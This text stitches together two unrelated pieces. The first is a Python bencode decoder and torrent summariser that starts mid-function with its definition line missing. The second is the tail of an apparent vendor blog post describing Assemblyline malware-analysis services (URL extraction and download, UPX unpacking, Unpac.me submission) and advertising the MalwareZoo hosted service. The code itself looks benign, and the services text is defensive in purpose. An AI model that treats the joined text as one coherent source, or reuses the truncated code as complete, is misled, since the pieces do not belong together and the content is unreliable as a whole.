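    """Decode one bencoded value starting at pos; return (value, next_pos)."""
    lead = data[pos:pos + 1]
    if lead == b"i":  # integer: i<digits>e
        end = data.index(b"e", pos)
        return int(data[pos + 1:end]), end + 1
    if lead in (b"l", b"d"):  # list: l...e, dictionary: d...e
        items, pos = [], pos + 1
        while data[pos:pos + 1] != b"e":
            item, pos = bdecode(data, pos)
            items.append(item)
        if lead == b"l":
            return items, pos + 1
        return dict(zip(items[0::2], items[1::2])), pos + 1
    colon = data.index(b":", pos)  # byte string: <length>:<bytes>
    start = colon + 1
    length = int(data[pos:colon])
    return data[start:start + length], start + length


def summarise_torrent(raw: bytes) -> dict:
    meta, _ = bdecode(raw)
    info = meta[b"info"]
    if b"files" in info:
        torrent_type = "multiple files"
        total = sum(entry[b"length"] for entry in info[b"files"])
    else:
        torrent_type = "single file"
        total = info[b"length"]
    piece_length = info[b"piece length"]
    return {
        "type": torrent_type,
        "size": total,
        # The "pieces" value concatenates one 20-byte SHA-1 digest per piece.
        "pieces": len(info[b"pieces"]) // 20,
        "last_piece_size": total % piece_length or piece_length,
    }


# Hand-built single-file torrent: 100 bytes in 32-byte pieces (4 pieces, dummy digests).
raw = (b"d4:infod6:lengthi100e4:name5:a.txt12:piece lengthi32e6:pieces80:"
       + bytes(80) + b"ee")
summary = summarise_torrent(raw)
print(summary)
```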

URLCreator Service

Create URI files for URIs extracted by other services based on their score or other specified criteria.

URLDownloader Service

Download seemingly malicious URLs using MAS' Kangooroo utility.

Unpacker Service

Unpack UPX packed executables for further analysis.

Unpac.me Service

Facilitates the submission of PE32 binaries to the unpac.me API and provides the results. UnpacMe is an automated malware unpacking service. Users of this service will need to bring their own UnpacMe API key (Community or Subscription).

Community Services

Assemblyline is also compatible with a range of community-created and community-maintained services, listed here. Note, however, that these services are not managed or officially endorsed by the Assemblyline team.

Wrapping Up

If your organisation is exploring Assemblyline and the available services listed here, take a look at our SaaS Assemblyline 4 product, MalwareZoo. MalwareZoo offers robust malware analysis and storage capabilities in a private environment, including all the built-in services outlined in this guide. Getting Assemblyline up and running for production purposes takes some work - work Cosive has already done for you!

MalwareZoo is fully installed, maintained, upgraded and secured by our team at Cosive, so your team can focus on what they do best: understanding and defending against malware. We’d love to hear about your malware analysis challenges and how we might be able to help.

Hero photo by Simon Kadula on Unsplash.